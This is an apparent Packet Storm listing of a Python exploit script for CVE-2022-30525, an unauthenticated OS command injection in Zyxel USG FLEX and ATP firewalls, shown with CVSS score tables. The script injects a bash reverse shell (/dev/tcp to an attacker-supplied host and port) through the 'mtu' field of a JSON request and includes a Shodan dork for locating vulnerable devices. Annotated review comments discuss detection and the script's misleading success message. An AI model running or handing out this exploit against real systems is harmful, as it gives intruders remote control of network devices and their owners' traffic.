packetstorm · Valentin Lobstein · PACKETSTORM:167372

Zyxel USG FLEX 5.21 Command Injection

2022-06-03 00:00:00
Valentin Lobstein
packetstormsecurity.com

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

`# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection  
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"  
# Date: May 18th 2022  
# Exploit Author: Valentin Lobstein  
# Vendor Homepage: https://www.zyxel.com  
# Version: ZLD5.00 thru ZLD5.21  
# Tested on: Linux  
# CVE: CVE-2022-30525  
  
  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
import sys  
import json  
import base64  
import requests  
import argparse  
  
  
# Command-line interface: the target URL plus the host/port that the injected
# command connects back to (they are interpolated into the "mtu" field in
# exploit()). None of the options is marked required; main() checks that.
parser = argparse.ArgumentParser(
    prog="CVE-2022-30525.py",
    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")

# Parsed at import time, not inside main(). Unset options are None, which is
# what main()'s "all parameters present" check relies on.
args = parser.parse_args()
  
banner = (  
"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"  
"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"  
"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"  
"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"  
"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"  
"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"  
"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"  
"biA6KSApCg=="  
)  
  
  
def main():
    """Validate the CLI options, build the handler URL and call exploit().

    Prints the banner first. Exits (status 0, after printing the argparse
    help) when any of -u/-r/-p was not given. Mutates the module-level
    ``args.url`` in place before passing it on.
    """

    print("\n" + base64.b64decode(banner).decode("utf-8"))

    # argparse leaves every unset option as None, so a single None means an
    # option is missing.
    if None in vars(args).values():
        print(f"[!] Please enter all parameters !")  # f-string without placeholders
        parser.print_help()
        sys.exit()

    # NOTE(review): this is a substring test, not a scheme check — a host name
    # that merely contains "http" would skip the "https://" prefix, and an
    # explicit "http://" URL is left as-is.
    if "http" not in args.url:
        args.url = "https://" + args.url
    # The request goes to the device's ZTP CGI handler; no credentials are
    # attached anywhere below (matches the PR:N rating above).
    args.url += "/ztp/cgi-bin/handler"
    exploit(args.url, args.host, args.port)
  
  
def exploit(url, host, port):
    """POST the crafted ``setWanPortSt`` JSON command to *url*.

    Args:
        url: full handler URL (main() has already appended
            ``/ztp/cgi-bin/handler``).
        host: address interpolated into the injected command as the
            connect-back target.
        port: port interpolated into the injected command.

    Side effects: silences urllib3's InsecureRequestWarning, prints progress
    lines, and calls ``sys.exit(1)`` on Ctrl-C or a request timeout. Note the
    progress line reads the module-level ``args.url``, not the *url* parameter.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
        "Content-Type": "application/json",
    }

    # JSON body of a WAN-port configuration command. Every field carries an
    # ordinary-looking value except "mtu", which holds the injected shell
    # command (shell metacharacters and a bash -c invocation). In legitimate
    # traffic "mtu" is presumably numeric, so a non-numeric "mtu" in a POST to
    # this handler is the observable signature for detection — TODO confirm
    # against the device's own request format.
    data = {
        "command": "setWanPortSt",
        "proto": "dhcp",
        "port": "4",
        "vlan_tagged": "1",
        "vlanid": "5",
        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
        "data": "hi",
    }
    # Certificate verification is turned off in the post() below (verify=False);
    # this only hides the warning that would otherwise be printed for it.
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")

    try:
        response = requests.post(
            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
        )
    except (KeyboardInterrupt, requests.exceptions.Timeout):
        print("[!] Bye Bye hekcer !")
        sys.exit(1)
    finally:
        # NOTE(review): the finally clause runs on every path — after a normal
        # return from post(), after the sys.exit(1) above, and after exceptions
        # the except clause does not catch (e.g. a connection error). `response`
        # is only bound when post() returned, so the NameError swallowed by the
        # bare except is what selects the "Enjoy your shell" line. A timeout
        # therefore prints both "Bye Bye" and "Enjoy your shell", and an
        # uncaught error prints "Enjoy your shell" before propagating; the
        # message is not evidence that the injected command ran.
        try:
            print("[!] Can't exploit the target ! Code :", response.status_code)

        except:
            print("[!] Enjoy your shell !!!")
  
  
# Script entry point. Argument parsing (parser.parse_args()) has already run
# at module import time, so main() only validates and dispatches.
if __name__ == "__main__":
    main()
  
`

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C